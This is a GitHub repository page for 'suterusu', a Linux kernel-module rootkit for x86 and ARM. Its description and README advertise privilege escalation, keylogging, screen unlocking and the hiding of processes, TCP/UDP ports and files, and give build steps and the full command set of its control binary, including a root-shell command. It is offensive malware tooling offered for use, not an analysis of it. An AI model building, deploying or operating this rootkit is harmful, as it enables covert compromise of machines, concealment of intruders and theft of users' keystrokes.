GitHub - zonepanda/suterusu: Fork from http://redmine.poppopret.org/projects/suterusu. An LKM rootkit targeting Linux 2.6/3.x on x86 and ARM. Supports privilege escalation, process hiding, connection hiding (TCP/UDP v4/v6), file/directory hiding, keylogging, and screen unlocking. Under active development.

zonepanda / suterusu Public

forked from dschuermann/suterusu

Notifications You must be signed in to change notification settings
Fork 0
Star 0

Fork from http://redmine.poppopret.org/projects/suterusu. An LKM rootkit targeting Linux 2.6/3.x on x86 and ARM. Supports privilege escalation, process hiding, connection hiding (TCP/UDP v4/v6), file/directory hiding, keylogging, and screen unlocking. Under active development.

0 stars 22 forks Branches Tags Activity

Star

Notifications

Branches Tags

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
Makefile		Makefile
README		README
sock.c		sock.c
suterusu.c		suterusu.c

Repository files navigation

Suterusu
========

Typical compilation steps:

$ wget http://kernel.org/linux-x.x.x.tar.gz
$ tar xvf linux-x.x.x.tar.gz
$ cd linux-x.x.x
$ make menuconfig
$ make modules_prepare
$ cd /path/to/suterusu
$ make linux-x86 KDIR=/path/to/kernel


To compile against the currently running kernel (kernel headers installed):

$ make linux-x86 KDIR=/lib/modules/$(uname -r)/build


If a specific toolchain is desired for cross-compilation, provide the
CROSS_COMPILE variable during make:

$ make android-arm CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel


To compile the command binary:
$ gcc sock.c -o sock


Commands
========

Root shell
$ ./sock 0

Hide PID
$ ./sock 1 [pid]

Unhide PID
$ ./sock 2 [pid]

Hide TCPv4 port
$ ./sock 3 [port]

Unhide TCPv4 port
$ ./sock 4 [port]

Hide TCPv6 port
$ ./sock 5 [port]

Unhide TCPv6 port
$ ./sock 6 [port]

Hide UDPv4 port
$ ./sock 7 [port]

Unhide UDPv4 port
$ ./sock 8 [port]

Hide UDPv6 port
$ ./sock 9 [port]

Unhide UDPv6 port
$ ./sock 10 [port]

Hide file/directory
$ ./sock 11 [name]

Unhide file/directory
$ ./sock 12 [name]

Note: At the moment, file/dir hiding only hides names in / directory